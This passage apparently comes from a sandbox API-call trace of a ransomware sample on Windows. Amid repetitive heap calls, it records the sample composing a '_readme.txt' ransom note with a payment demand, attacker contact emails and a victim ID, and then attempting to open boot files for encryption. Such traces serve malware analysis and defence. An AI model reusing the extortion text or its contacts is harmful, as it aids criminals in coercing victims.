Size=0x20) returned 0x2d27a68 [0179.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.098] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0179.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.098] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.098] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.098] PathFindFileNameW (pszPath="") returned="" [0179.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.098] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.099] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0179.099] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0179.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.099] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.099] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0179.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.099] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0179.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.100] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.100] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.100] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.102] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*" (normalized: "c:\\boot\\it-it\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.102] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.102] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.103] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0179.103] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.104] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.104] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.105] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.105] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.107] HeapFree (in: 